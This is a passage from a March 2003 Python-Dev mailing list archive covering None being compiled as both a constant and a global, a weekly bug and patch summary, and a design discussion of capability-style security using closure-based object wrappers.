news:002001c2f636$77ad2ce0$e60ca044@oemcomputer...
> >>> def f():
>  None
>
> >>> dis(f)
> 2           0 LOAD_GLOBAL              0 (None)
>               3 POP_TOP
>               4 LOAD_CONST               0 (None)
>               7 RETURN_VALUE
>
> >>> None = 1
> <stdin>:1: SyntaxWarning: assignment to None
> >>> f() == None
> False
>
>
> Is this a bug?

If one understands (as I do) the default return 'None' to mean the
singleton NoneType object that the name 'None' is assumed to be bound
to in the docs and which it is bound to on startup, then no.

> Should the compiler use the GLOBAL in both places?
> Or, is it reasonable to use CONST in both places?

I understood the latter to be the plan after a sufficient warning
period.

TJR


From ping@zesty.ca  Sun Mar 30 00:27:50 2003
From: ping@zesty.ca (Ka-Ping Yee)
Date: Sat, 29 Mar 2003 18:27:50 -0600 (CST)
Subject: [Python-Dev] Capabilities
In-Reply-To: <200303102023.h2AKNAw23873@oma.cosc.canterbury.ac.nz>
Message-ID: <Pine.LNX.4.33.0303291827260.10689-100000@server1.lfw.org>

On Tue, 11 Mar 2003, Greg Ewing wrote:
> Perhaps it would be useful to distinguish between what
> might be called "read-only" introspection, and more
> powerful forms of introspection.
>
> Usually it doesn't do any harm to be able to find out
> things like what class an object belongs to and what
> methods it supports, so perhaps these kinds of
> introspections don't need to be restricted by default.

A serious flaw with this particular point is that Python
does not separate the identity of a class from the power
to create instances of that class.  Having access to a
particular instance should certainly not allow one to
ask it for its class, and then instantiate the class with
arbitrary constructor arguments.
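
A minimal illustration of the problem (Account is a made-up class, used
only for this sketch):

```python
class Account:
    def __init__(self, balance):
        self.balance = balance

granted = Account(10)    # the only object the client was handed

# The client never received the Account class itself, yet it can recover
# the class from the instance and construct a fresh object with whatever
# constructor arguments it likes.
forged = granted.__class__(1000000)

print(forged.balance)
```

Holding one instance is enough to mint new ones, so the class acts as
an authority that was never explicitly granted.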


-- ?!ng


From ping@zesty.ca  Sun Mar 30 00:31:18 2003
From: ping@zesty.ca (Ka-Ping Yee)
Date: Sat, 29 Mar 2003 18:31:18 -0600 (CST)
Subject: [Python-Dev] Capabilities
In-Reply-To: <3E6CAF65.4040505@zope.com>
Message-ID: <Pine.LNX.4.33.0303291829420.10689-100000@server1.lfw.org>

On Mon, 10 Mar 2003, Jim Fulton wrote:
> > Maybe every Python object should have a flag which
> > can be set to prevent introspection -- like the current
> > restricted execution mechanism, but on a per-object
> > basis. Then any object could be used as a capability.
>
> Yes, but not a very useful one.  For example, given a file,
> you often want to create a "file read" capability which is
> an object that allows reading the file but not writing the file.
> Just preventing introspection isn't enough.

All right.  Let me provide an example; maybe this can help ground
the discussion a bit.  We seem to be doing a lot of dancing around
the issue of what a capability is.

In my view, it's a red herring to discuss whether or not a
particular object "is a capability" or not.  It's like asking
whether something is an "object".  Capabilities are a discipline
under which objects are used -- it's better to think of them as
a technique or a style of programming.

What is at issue here (IMHO) is "how might Python change to
facilitate this style of programming?"

(The analogy with object-oriented programming holds here also.
Even if Python didn't have a "class" keyword, you could still
program in an object-oriented style.  In fact, the C implementation
of Python is clearly object-oriented, even though C has no features
specifically designed for OOP.  But adding "class" made it a lot
easier to do a particular style of object-oriented programming in
Python.  Unfortunately, the particular style encouraged by Python's
"class" keyword doesn't work so well for capability-style programming,
because all instance state is public.  But Python's "class" is not
the only way to do object-oriented programming -- see below.)

Okay, at last to the example, then.

Here is one way to program in a capability style using today's
Python, relying on no changes to the interpreter.  This example
defines a "class" called DirectoryReader that provides read-only
access to only a particular subtree of the filesystem.


    import os

    class Namespace:
        def __init__(self, *args, **kw):
            for value in args:
                self.__dict__[value.__name__] = value
            for name, value in kw.items():
                self.__dict__[name] = value

    class ReadOnly(Namespace):
        def __setattr__(self, name, value):
            raise TypeError('read-only namespace')

    def FileReader(path, name):
        self = Namespace(file=open(path, 'r'))

        def __repr__():
            return '<FileReader %r>' % name

        def reset():
            self.file.seek(0)

        return ReadOnly(__repr__, reset, self.file.read, self.file.close)

    def DirectoryReader(path, name):
        def __repr__():
            return '<DirectoryReader %r>' % name

        def list():
            return os.listdir(path)

        def readfile(name):
            fullpath = os.path.join(path, name)
            if os.path.isfile(fullpath):
                return FileReader(fullpath, name)

        def getdir(name):
            fullpath = os.path.join(path, name)
            if os.path.isdir(fullpath):
                return DirectoryReader(fullpath, name)

        return ReadOnly(__repr__, list, readfile, getdir)


Now, if we pass an instance of DirectoryReader to code running in
restricted mode, I think this is actually secure.

Specifically, the only introspective attributes we have to disallow, in
order for these objects to enforce their intended restrictions, are
im_self and func_globals.  Of course, we still have to hide __import__ and
sys.modules if we want to prevent code from obtaining access to the
filesystem in other ways.

Hiding __dict__, while it has no impact on restricting filesystem access,
allows us to pass the same DirectoryReader object to two clients without
inadvertently creating a communication channel between them.


-- ?!ng


From tim_one@email.msn.com  Sun Mar 30 02:24:29 2003
From: tim_one@email.msn.com (Tim Peters)
Date: Sat, 29 Mar 2003 21:24:29 -0500
Subject: [Python-Dev] Compiler treats None both as a constant and variable
In-Reply-To: <002001c2f636$77ad2ce0$e60ca044@oemcomputer>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEAOEEAB.tim_one@email.msn.com>

[Raymond Hettinger]
> >>> def f():
>  None
>
> >>> dis(f)
> 2           0 LOAD_GLOBAL              0 (None)
>               3 POP_TOP
>               4 LOAD_CONST               0 (None)
>               7 RETURN_VALUE
>
> >>> None = 1
> <stdin>:1: SyntaxWarning: assignment to None
> >>> f() == None
> False
>
>
> Is this a bug?

It's arguable, but it's always been this way, and is so boring that nobody
has bothered to argue about it before <wink>.

It's clear that explicit references to names must follow "the usual" name
resolution rules, so you can't gripe about the LOAD_GLOBAL in this function:
None is the name of a builtin, and in the language as currently defined,
builtin names can be shadowed by globals or locals.

What's arguable is the LOAD_CONST, which is generated for the implicit
reference to None.  The meaning of the Ref Man's

    A call always returns some value, possibly None, unless it raises an
    exception.  How this value is computed depends on the type of the
    callable object.

is arguably arguable, but I don't think *reasonably* so.  To me it clearly
intends "the" None, not whatever object you get by evaluating name "None"
inside the callable.  Likewise when it says the default value of
object.__doc__ is None, I think it also clearly means "the" None.

> Should the compiler use the GLOBAL in both places?

For backward compatibility it has to retain the LOAD_CONST.  In this
specific example, it doesn't matter whether the first is LOAD_CONST, or
LOAD_GLOBAL, or simply thrown away, since the

    LOAD_GLOBAL 0
    POP_TOP

pair has no visible effect.  If it were a more interesting function, like

    def f():
        global aglobal
        aglobal = None

then for backward compatibility it would have to remain LOAD_GLOBAL.

> Or, is it reasonable to use CONST in both places?

Not today, but we should be moving in that direction.  IMO, None should
become a keyword.
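
For comparison, a short sketch of how this looks on a Python 3
interpreter, where None is in fact a keyword.  It assumes Python 3 and
does not apply to the 2.x releases discussed in this thread.

```python
import dis

def f():
    None

# The function's code object no longer refers to None by name, so there
# is no global lookup left that a rebinding could intercept.
print(f.__code__.co_names)

# Assigning to None is rejected at compile time instead of drawing a warning.
try:
    compile("None = 1", "<example>", "exec")
    rejected = False
except SyntaxError:
    rejected = True
print("assignment rejected:", rejected)

dis.dis(f)
```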


From skip@mojam.com  Sun Mar 30 13:00:29 2003
From: skip@mojam.com (Skip Montanaro)
Date: Sun, 30 Mar 2003 07:00:29 -0600
Subject: [Python-Dev] Weekly Python Bug/Patch Summary
Message-ID: <200303301300.h2UD0TN06135@manatee.mojam.com>

Bug/Patch Summary
-----------------

379 open / 3499 total bugs (+9)
138 open / 2050 total patches (+7)

New Bugs
--------

Lineno calculation sometimes broken (2003-03-24)
	http://python.org/sf/708901
socket timeouts produce wrong errors in win32 (2003-03-24)
	http://python.org/sf/708927
sgmllib.SGMLParser.reset() problem (2003-03-25)
	http://python.org/sf/709491
IDE stdin doesn't have readlines (2003-03-26)
	http://python.org/sf/710373
Raise IDE output window over splash screen on early crash (2003-03-26)
	http://python.org/sf/710374
math.log(0) differs from math.log(0L) (2003-03-27)
	http://python.org/sf/711019
A large block of commands after an "if" cannot be compiled (2003-03-28)
	http://python.org/sf/711268
htmllib.HTMLParser.anchorlist problem (2003-03-28)
	http://python.org/sf/711632
SEEK_{SET,CUR,END} missing in 2.2.2 (2003-03-29)
	http://python.org/sf/711830
Lookup of Mac error string can mess up resfile chain (2003-03-29)
	http://python.org/sf/711967
gensuitemodule needs to be documented (2003-03-29)
	http://python.org/sf/711986
IDE textwindow scrollbar is over-enthusiastic (2003-03-29)
	http://python.org/sf/711989
IDE needs easy access to builtin help() (2003-03-29)
	http://python.org/sf/711991
OpenBSD 3.2: make altinstall dumps core (2003-03-29)
	http://python.org/sf/712056

New Patches
-----------

add offset to mmap (2003-03-23)
	http://python.org/sf/708374
OpenVMS complementary patches (2003-03-23)
	http://python.org/sf/708495
unchecked return values - compile.c (2003-03-23)
	http://python.org/sf/708604
remove -static option from cygwinccompiler (2003-03-24)
	http://python.org/sf/709178
CALL_ATTR opcode (2003-03-25)
	http://python.org/sf/709744
Make "%c" % u"a" work (2003-03-26)
	http://python.org/sf/710127
Backport to 2.2.2 of codec registry fix (2003-03-27)
	http://python.org/sf/710576
new test_urllib and patch for found urllib bug (2003-03-27)
	http://python.org/sf/711002
Warn about inter-module assignments shadowing builtins (2003-03-28)
	http://python.org/sf/711448
Removing unnecessary lock operations (2003-03-29)
	http://python.org/sf/711835
urllib2 doesn't support non-anonymous ftp (2003-03-29)
	http://python.org/sf/711838
Cause pydoc to show data descriptor __doc__ strings (2003-03-29)
	http://python.org/sf/711902
Obsolete comment in urlparse.py (2003-03-30)
	http://python.org/sf/712124

Closed Bugs
-----------

2.3a2 build fails on Solaris: posixmodule (2003-02-20)
	http://python.org/sf/690317
string.atoi function causing TypeError (2003-03-04)
	http://python.org/sf/697591
Tk 8.4.2 and Tkinter.py _substitue function (2003-03-05)
	http://python.org/sf/698517
_tkinter.c won't build w/o threads? (2003-03-16)
	http://python.org/sf/704641
imap docs: s/criterium/criterion/ (2003-03-17)
	http://python.org/sf/705120
timeouts incompatible w/ line-oriented protocols (2003-03-20)
	http://python.org/sf/707074
DistributionMetaData error ? (2003-03-23)
	http://python.org/sf/708320

Closed Patches
--------------

fix xmlrpclib float marshalling bug (2002-03-19)
	http://python.org/sf/532180
Add _winreg support for Cygwin (2002-05-11)
	http://python.org/sf/554807
New codecs: html, asciihtml (2002-08-03)
	http://python.org/sf/590682
Check for readline 2.2 features (2002-12-29)
	http://python.org/sf/659834
AE Inheritance fixes (2003-03-12)
	http://python.org/sf/702620
Improve code generation (2003-03-20)
	http://python.org/sf/707257
fix for #698517, Tkinter and tk8.4.2 (2003-03-21)
	http://python.org/sf/707701
unchecked return value in import.c (2003-03-22)
	http://python.org/sf/708201


From ping@zesty.ca  Sun Mar 30 17:31:37 2003
From: ping@zesty.ca (Ka-Ping Yee)
Date: Sun, 30 Mar 2003 11:31:37 -0600 (CST)
Subject: [Python-Dev] Capabilities
In-Reply-To: <Pine.LNX.4.33.0303291829420.10689-100000@server1.lfw.org>
Message-ID: <Pine.LNX.4.33.0303301125530.16301-100000@server1.lfw.org>

On Sat, 29 Mar 2003, Ka-Ping Yee wrote:
> Okay, at last to the example, then.

The following is a better formulation in the capability style --
please ignore the previous one.

The previously posted code allows names to carry authority, which
is a big no-no.  This code gets rid of names altogether in the API
for file access; it's better to deal with just objects.

    import os, __builtin__

    class Namespace:
        def __init__(self, *args, **kw):
            for value in args:
                self.__dict__[value.__name__] = value
            for name, value in kw.items():
                self.__dict__[name] = value

    class ImmutableNamespace(Namespace):
        def __setattr__(self, name, value):
            raise TypeError('read-only namespace')

    def ReadStream(file, name):
        def __repr__():
            return '<ReadStream %r>' % name

        return ImmutableNamespace(__repr__, file.read, file.close, name=name)

    def FileReader(path, name):
        def __repr__():
            return '<FileReader %r>' % name

        def open():
            return ReadStream(__builtin__.open(path, 'r'), name)

        def getsize():
            return os.path.getsize(path)

        def getmtime():
            return os.path.getmtime(path)

        return ImmutableNamespace(__repr__, open, getsize, getmtime, name=name)

    def DirectoryReader(path, name):
        def __repr__():
            return '<DirectoryReader %r>' % name

        def getfiles():
            files = []
            for name in os.listdir(path):
                fullpath = os.path.join(path, name)
                if os.path.isfile(fullpath):
                    files.append(FileReader(fullpath, name))
            return files

        def getdirs():
            dirs = []
            for name in os.listdir(path):
                fullpath = os.path.join(path, name)
                if os.path.isdir(fullpath):
                    dirs.append(DirectoryReader(fullpath, name))
            return dirs

        return ImmutableNamespace(__repr__, getfiles, getdirs, name=name)


-- ?!ng


From paul@prescod.net  Sun Mar 30 18:43:12 2003
From: paul@prescod.net (Paul Prescod)
Date: Sun, 30 Mar 2003 10:43:12 -0800
Subject: [Python-Dev] Capabilities
In-Reply-To: <Pine.LNX.4.33.0303291829420.10689-100000@server1.lfw.org>
References: <Pine.LNX.4.33.0303291829420.10689-100000@server1.lfw.org>
Message-ID: <3E873AC0.2050004@prescod.net>

Ka-Ping Yee wrote:
>...
> 
> Specifically, the only introspective attributes we have to disallow, in
> order for these objects to enforce their intended restrictions, are
> im_self and func_globals.  Of course, we still have to hide __import__ and
> sys.modules if we want to prevent code from obtaining access to the
> filesystem in other ways.

It wouldn't have hurt for you to describe how the code achieves security 
by using lexical closure namespaces instead of dictionary-backed 
namespaces. ;) Part of the trick is that the external names are 
irrelevant to the functioning of the object.

I don't understand one thing.

The immutability imposed by the "ImmutableNamespace" trick is easy to 
turn off. But once I turn it off, I couldn't figure out any way to 
violate the security because the closure's variables are invisible to 
any code that is not defined within its block. Why bother with the 
ImmutableNamespace bit at all?

x = DirectoryReader(".", "foo")
print x.getfiles()
del x.__class__.__setattr__
x.foo = 5
del x.getfiles
del x.getdirs
x.getfiles()

Traceback (most recent call last):
   File "../foo.py", line 64, in ?
     x.getfiles()
AttributeError: ImmutableNamespace instance has no attribute 'getfiles'

But I couldn't figure out how to use this to get access to the file 
system because as I said before, the external names are irrelevant to 
the object's implementation. They are early bound.

     def FileReader(path, name):
           ...
           def open2():
             print "open2"
             return open()


direct = DirectoryReader(".", "foo")
file = direct.getfiles()[0]
print file.open2()

FileReaderClass = file.__class__
del FileReaderClass.__setattr__

del file.open
print file.open2()

"open2" binds to open at definition time, not at runtime. I can't see in 
this model how to implement what C++ calls a "friend" class. Even C++ 
and Java have ways that related classes can poke around each others 
internals. So perhaps this is part of what would need to change in 
Python to have a first-class capabilities feature.
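
A minimal sketch of the point above, assuming Python 3 and using
types.SimpleNamespace as a stand-in for the Namespace class (Greeter,
reveal and reveal2 are made-up names). The inner function finds its
sibling through the enclosing scope, not through the attributes of the
object that callers hold, so deleting the public name changes nothing
for it. In an unrestricted interpreter the closure is still reachable
through introspection (for example the function's __closure__
attribute), which is why such attributes would have to be hidden.

```python
from types import SimpleNamespace

def Greeter(secret):
    # `secret` and `reveal` live only in this call's closure.
    def reveal():
        return secret

    def reveal2():
        # Resolves `reveal` in the enclosing scope, not on the
        # namespace object handed to the caller.
        return reveal()

    return SimpleNamespace(reveal=reveal, reveal2=reveal2)

g = Greeter("hidden")
del g.reveal                # remove the externally visible name
still_works = g.reveal2()   # the closure still reaches the inner function
```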

If this technique became widespread, Python's restrictions on assigning 
to lexically inherited variables would probably become annoying.

  Paul Prescod


From guido@python.org  Sun Mar 30 19:02:38 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 30 Mar 2003 14:02:38 -0500
Subject: [Python-Dev] Compiler treats None both as a constant and variable
In-Reply-To: "Your message of Sat, 29 Mar 2003 16:02:10 EST."
 <002001c2f636$77ad2ce0$e60ca044@oemcomputer>
References: <002001c2f636$77ad2ce0$e60ca044@oemcomputer>
Message-ID: <200303301902.h2UJ2cU00562@pcp02138704pcs.reston01.va.comcast.net>

> >>> def f():
>  None  
> 
> >>> dis(f)
> 2           0 LOAD_GLOBAL              0 (None)
>               3 POP_TOP             
>               4 LOAD_CONST               0 (None)
>               7 RETURN_VALUE 
> 
> >>> None = 1
> <stdin>:1: SyntaxWarning: assignment to None
> >>> f() == None
> False
> 
> 
> Is this a bug?

Yes, assigning to None is a bug. :-)

> Should the compiler use the GLOBAL in both places?

No, not until we've officially changed the rules.

> Or, is it reasonable to use CONST in both places?

No, not until assigning to None is an error rather than a warning.
This will have to wait until at least 2.4 -- the warning is new in
2.3.
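
For readers on a later interpreter, a minimal sketch assuming Python 3,
where the rule change described above has since been made: assignment
to None is rejected at compile time, and the compiler no longer emits a
global lookup for it. The helper name compiles() is made up for
illustration.

```python
import dis

def compiles(source):
    """Return True if `source` compiles, False on SyntaxError."""
    try:
        compile(source, "<example>", "exec")
        return True
    except SyntaxError:
        return False

def f():
    None

# Opcode names used by f; with None as a true constant there is no
# global name lookup left that a rebinding could affect.
opnames = [ins.opname for ins in dis.get_instructions(f)]

assignment_allowed = compiles("None = 1")
uses_global_lookup = "LOAD_GLOBAL" in opnames
```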

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Sun Mar 30 19:08:19 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 30 Mar 2003 14:08:19 -0500
Subject: [Python-Dev] Capabilities
In-Reply-To: "Your message of Sat, 29 Mar 2003 18:27:50 CST."
 <Pine.LNX.4.33.0303291827260.10689-100000@server1.lfw.org>
References: <Pine.LNX.4.33.0303291827260.10689-100000@server1.lfw.org>
Message-ID: <200303301908.h2UJ8Jd00667@pcp02138704pcs.reston01.va.comcast.net>

[Ping]
> Having access to a particular instance should certainly not allow
> one to ask it for its class, and then instantiate the class with
> arbitrary constructor arguments.

Assuming the Python code in the class itself is not empowered in any
special way, I don't see why not.  So that suggests that you assume
classes can be empowered.  I can see this for classes implemented in
C; but how can classes implemented in pure Python be empowered?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From ping@zesty.ca  Sun Mar 30 20:45:09 2003
From: ping@zesty.ca (Ka-Ping Yee)
Date: Sun, 30 Mar 2003 14:45:09 -0600 (CST)
Subject: [Python-Dev] Capabilities
In-Reply-To: <3E873AC0.2050004@prescod.net>
Message-ID: <Pine.LNX.4.33.0303301433350.22036-100000@server1.lfw.org>

On Sun, 30 Mar 2003, Paul Prescod wrote:
> It wouldn't have hurt for you to describe how the code achieves security
> by using lexical closure namespaces instead of dictionary-backed
> namespaces. ;)

Sorry.  :)  I assumed it would be clear.

> I don't understand one thing.
>
> The immutability imposed by the "ImmutableNamespace" trick is easy to
> turn off. But once I turn it off, I couldn't figure out any way to
> violate the security because the closure's variables are invisible to
> any code that is not defined within its block. Why bother with the
> ImmutableNamespace bit at all?

That immutability isn't required in order to prevent filesystem access.
That immutability is only there to keep multiple clients of the same
DirectoryReader from using the DirectoryReader as a communication channel.

> del x.__class__.__setattr__

Sneaky.  :)   In restricted mode you wouldn't be able to do that.

> I can't see in
> this model how to implement what C++ calls a "friend" class.

I haven't tried an example that requires that yet, but two classes
could communicate through access to a shared object if they wanted to.

> If this technique became widespread, Python's restrictions on assigning
> to lexically inherited variables would probably become annoying.

The Namespace offers a possible workaround.  I didn't end up using
it in my second code example because none of the objects have
mutable state, but here's how you could do it:

    def Counter():
        self = Namespace()
        self.i = 0

        def next():
            self.i += 1
            return self.i

        return ImmutableNamespace(next)
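
A self-contained version of the Counter above that can be run as
written, assuming Python 3; Namespace and ImmutableNamespace are copied
from the earlier message. The mutable state sits on a private Namespace
held in the closure, while clients only get the read-only wrapper.

```python
class Namespace:
    def __init__(self, *args, **kw):
        for value in args:
            self.__dict__[value.__name__] = value
        for name, value in kw.items():
            self.__dict__[name] = value

class ImmutableNamespace(Namespace):
    def __setattr__(self, name, value):
        raise TypeError('read-only namespace')

def Counter():
    self = Namespace()      # private, mutable; never handed out
    self.i = 0

    def next():
        self.i += 1
        return self.i

    return ImmutableNamespace(next)

c = Counter()
first, second = c.next(), c.next()

try:
    c.i = 100               # clients cannot add or rebind attributes
    blocked = False
except TypeError:
    blocked = True
```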

It would be cool if you could suggest little "security challenges"
to work through.  Given specific scenarios requiring things like
mutability or friend classes, i think trying to implement them in
this style could be very instructive.


-- ?!ng


From ping@zesty.ca  Sun Mar 30 20:53:59 2003
From: ping@zesty.ca (Ka-Ping Yee)
Date: Sun, 30 Mar 2003 14:53:59 -0600 (CST)
Subject: [Python-Dev] Capabilities
In-Reply-To: <200303301908.h2UJ8Jd00667@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <Pine.LNX.4.33.0303301445260.22036-100000@server1.lfw.org>

On Sun, 30 Mar 2003, Guido van Rossum wrote:
> [Ping]
> > Having access to a particular instance should certainly not allow
> > one to ask it for its class, and then instantiate the class with
> > arbitrary constructor arguments.
>
> Assuming the Python code in the class itself is not empowered in any
> special way, I don't see why not.  So that suggests that you assume
> classes can be empowered.  I can see this for classes implemented in
> C; but how can classes implemented in pure Python be empowered?

In many classes, __init__ exercises authority.  An obvious C type with
the same problem is the "file" type (being able to ask a file object
for its type gets you the ability to open any file on the filesystem).
But many Python classes are in the same position -- they acquire
authority upon initialization.

To pick one at random, consider zipfile.ZipFile.  At first glance it
appears that once you create a ZipFile object with mode "r" you can
hand it off to provide read-only access to a zip archive.  (Even if
a security audit of the code reveals holes, my point is that the API
isn't far from accommodating such a design intent.)

It's useful to be able to separate the authority to read one
particular instance of ZipFile from the authority to instantiate
new ZipFiles, which currently allows you to open any zip file on
the filesystem for reading or writing.
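
A minimal sketch of the concern, assuming Python 3 and a scratch
directory (the file names are made up). Holding one ZipFile opened with
mode "r" is enough to reach the class and call its constructor with
other arguments.

```python
import os
import tempfile
import zipfile

workdir = tempfile.mkdtemp()
archive = os.path.join(workdir, "a.zip")
other = os.path.join(workdir, "b.zip")

with zipfile.ZipFile(archive, "w") as z:
    z.writestr("hello.txt", "hi")

# Hand out what looks like read-only access to one archive.
reader = zipfile.ZipFile(archive, "r")

# The holder can still ask for the class and use its constructor
# to create (here: write) a different archive.
ZipClass = type(reader)
with ZipClass(other, "w") as z2:
    z2.writestr("surprise.txt", "written via type(reader)")

reader.close()
created = os.path.exists(other)
```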


-- ?!ng


From paul@prescod.net  Sun Mar 30 21:59:26 2003
From: paul@prescod.net (Paul Prescod)
Date: Sun, 30 Mar 2003 13:59:26 -0800
Subject: [Python-Dev] Capabilities
In-Reply-To: <Pine.LNX.4.33.0303301433350.22036-100000@server1.lfw.org>
References: <Pine.LNX.4.33.0303301433350.22036-100000@server1.lfw.org>
Message-ID: <3E8768BE.8010603@prescod.net>

Ka-Ping Yee wrote:
> On Sun, 30 Mar 2003, Paul Prescod wrote:
> 
>>It wouldn't have hurt for you to describe how the code achieves security
>>by using lexical closure namespaces instead of dictionary-backed
>>namespaces. ;)
> 
> Sorry.  :)  I assumed it would be clear.

It probably is for those following the thread more closely.

> That immutability isn't required in order to prevent filesystem access.

Okay, now I see that that's what you meant about "__dict__". You were 
talking about the object's namespace in general, not the magical 
attribute named __dict__.

>...
>>del x.__class__.__setattr__
> 
> Sneaky.  :)   

I would have complimented you on the elegance of this proposal but I 
thought it might just be a translation of E's object construct. To 
whatever extent you innovated in creating it, congratulations, it's very 
cool.

 >  ....In restricted mode you wouldn't be able to do that.

I'm not clear (because I've been following the thread with half my 
brain, over quite a few days) whether you are making or have made some 
specific proposal. I guess you are proposing a restricted mode that 
would make this example actually secure as opposed to almost secure. Are 
you also proposing any changes to the syntax?

Also, is restricted mode an interpreter mode or is it scoped by module? 
I can't see how it would work as an interpreter mode because too much 
library code depends on introspectability and hackability of Python objects.

>>I can't see in
>>this model how to implement what C++ calls a "friend" class.
> 
> I haven't tried an example that requires that yet, but two classes
> could communicate through access to a shared object if they wanted to.

This doesn't actually simulate "friend" but that's probably because 
friend makes no sense in a capability system.

It occurs to me after further thought that there are two orthogonal 
problems. First is privacy for the sake of software engineering. Python 
has always rejected that and I'm glad it has (although it makes advocacy 
harder). This sort of privacy just gets in your way when you're trying 
to coerce code into doing what you want when it wasn't designed to. 
Languages like C++ make it really hard to hack when you need to, but 
they don't really prevent you from doing it if you are determined 
enough, so you have the worst of both worlds.

Second, is safety for the sake of security. IF you have chosen the 
capabilities model of security, THEN "friend" perhaps doesn't make 
sense. You either have a capability reference or you don't. The code's 
compile-time class or package is irrelevant. Allowing classes (as 
opposed to objects) to declare each other friends probably only opens up 
security holes.

But if you want to have an example of something like this for the record 
books, perhaps you could implement an iterator over a data structure 
with the caveat that we'd like to implement the iterator and data 
structure in separate files (because sometimes the implementation of 
each could be large and complicated). I think it works like this:

The data structure is one capability class. The iterator is another. The 
application asks the data structure to create an iterator. The data 
structure creates one and passes some subset of its internal state to 
the new object. It probably could not (and anyway should not) pass a 
pointer to the opaque closure that is its external representation. So 
instead it passes in whatever state variables the iterator is likely to 
be interested in.
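
A rough sketch of that arrangement, assuming Python 3. Stack and
StackIterator are hypothetical names, types.SimpleNamespace stands in
for the Namespace class, and both constructors are shown in one block
for brevity even though the point is that they could live in separate
files. The data structure hands the iterator a snapshot of the state it
needs, not a reference to itself.

```python
from types import SimpleNamespace

def StackIterator(snapshot):
    index = 0

    def next():
        nonlocal index
        if index >= len(snapshot):
            raise StopIteration
        value = snapshot[index]
        index += 1
        return value

    return SimpleNamespace(next=next)

def Stack(*initial):
    items = list(initial)       # private state, held in the closure

    def push(x):
        items.append(x)

    def iterate():
        # Pass only the state the iterator needs (a tuple copy),
        # never the Stack object or its mutable list.
        return StackIterator(tuple(items))

    return SimpleNamespace(push=push, iterate=iterate)

stack = Stack(1, 2)
it = stack.iterate()
stack.push(3)                   # not visible to the existing iterator
seen = [it.next(), it.next()]
```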

If you did want to emulate class-based "friendship" (can't think of why, 
off the top of my head) you could do so like this:

    def tellMeYourSecrets(myfriend):
       if isinstance(myfriend, MyFriendClass):
           return my_namespace()
       else:
           raise SecurityViolation, "Bug off"


The example in Stroustrup is where you want a vector class to be able to 
directly read the internals of a matrix class rather than go through 
inefficient method calls. But in a capabilities universe, even matrices 
can't, in general, see the internals of other matrices. I guess they'd 
have to use the trick above if that was really necessary.

>>If this technique became widespread, Python's restrictions on assigning
>>to lexically inherited variables would probably become annoying.
> 
> 
> The Namespace offers a possible workaround. 

Yes, but why workaround rather than fix? Is there a deep reason Python 
objects can't write to intermediate namespaces? Is it just a little bit 
of extra safety against accidentally overwriting something? This is 
probably overkill in the case of intermediate scopes. And if not, there 
could be a keyword which is like global but for intermediate scopes.
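
For reference, later versions of the language did add such a keyword:
Python 3 has a nonlocal statement. A minimal sketch, assuming Python 3,
of the counter written without the Namespace workaround:

```python
def Counter():
    i = 0

    def next():
        nonlocal i      # rebind `i` in the enclosing Counter() call
        i += 1
        return i

    return next

tick = Counter()
values = [tick(), tick(), tick()]

# Each call to Counter() gets its own independent `i`.
other = Counter()
other_first = other()
```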

> ...
> It would be cool if you could suggest little "security challenges"
> to work through.  Given specific scenarios requiring things like
> mutability or friend classes, i think trying to implement them in
> this style could be very instructive.

Unfortunately, most of the examples I can come up with seem to be hacks, 
workarounds and optimizations. It isn't surprising that sometimes you 
lose some efficiency or simplicity when working in a secure system.

It makes me wonder about whether E might be less fun, efficient and 
productive than Python because security is embedded so deeply within it? 
(just a speculation...I don't know E) A Python that could go back and 
forth from secure mode to insecure mode might be a nice compromise.

  Paul Prescod


From paul@prescod.net  Sun Mar 30 22:45:38 2003
From: paul@prescod.net (Paul Prescod)
Date: Sun, 30 Mar 2003 14:45:38 -0800
Subject: [Python-Dev] Capabilities
In-Reply-To: <Pine.LNX.4.33.0303301445260.22036-100000@server1.lfw.org>
References: <Pine.LNX.4.33.0303301445260.22036-100000@server1.lfw.org>
Message-ID: <3E877392.9060509@prescod.net>

Ka-Ping Yee wrote:
>...
> In many classes, __init__ exercises authority.  An obvious C type with
> the same problem is the "file" type (being able to ask a file object
> for its type gets you the ability to open any file on the filesystem).
> But many Python classes are in the same position -- they acquire
> authority upon initialization.

Just out of curiosity wouldn't you say that part of the capability zen 
is that capabilities that allow you to turn global strings into objects 
should either not exist or be very segmented from other capabilities? 
(in fact I remember discussing this with you at some Python conference!)

In capdesk, I believe you drag a capability for a file from one window 
to another so that the "drop target" never needs to know or care what 
the filename was.

So it might be better to separate the authority from the __init__ than 
to separate constructors from classes. Arguably it is better to add to 
the library than to change the language.

return securefile("foo.txt").reader()

x = zipfile.ZipFile(securefile("foo.txt").reader())
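
securefile() above is hypothetical. As a sketch of the same idea with
what exists today, assuming Python 3: zipfile.ZipFile accepts an
already-open file-like object, so the code that reads the archive never
needs a filename. The helper names and the in-memory stream below are
made up for illustration.

```python
import io
import zipfile

def make_archive_bytes():
    """Build a small zip archive in memory and return its bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("foo.txt", "contents")
    return buf.getvalue()

def list_names(stream):
    """Needs only an already-open binary stream; never sees a path."""
    with zipfile.ZipFile(stream) as z:
        return z.namelist()

names = list_names(io.BytesIO(make_archive_bytes()))
```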

  Paul Prescod


From guido@python.org  Mon Mar 31 00:09:52 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 30 Mar 2003 19:09:52 -0500
Subject: [Python-Dev] Capabilities
In-Reply-To: "Your message of Sun, 30 Mar 2003 14:53:59 CST."
 <Pine.LNX.4.33.0303301445260.22036-100000@server1.lfw.org>
References: <Pine.LNX.4.33.0303301445260.22036-100000@server1.lfw.org>
Message-ID: <200303310009.h2V09qx01754@pcp02138704pcs.reston01.va.comcast.net>

> > [Ping]
> > > Having access to a particular instance should certainly not allow
> > > one to ask it for its class, and then instantiate the class with
> > > arbitrary constructor arguments.

[Guido]
> > Assuming the Python code in the class itself is not empowered in any
> > special way, I don't see why not.  So that suggests that you assume
> > classes can be empowered.  I can see this for classes implemented in
> > C; but how can classes implemented in pure Python be empowered?

[Ping]
> In many classes, __init__ exercises authority.  An obvious C type with
> the same problem is the "file" type (being able to ask a file object
> for its type gets you the ability to open any file on the filesystem).
> But many Python classes are in the same position -- they acquire
> authority upon initialization.

What do you mean exactly by "exercise authority"?  Again, I understand
this for C code, but it would seem that all authority ultimately comes
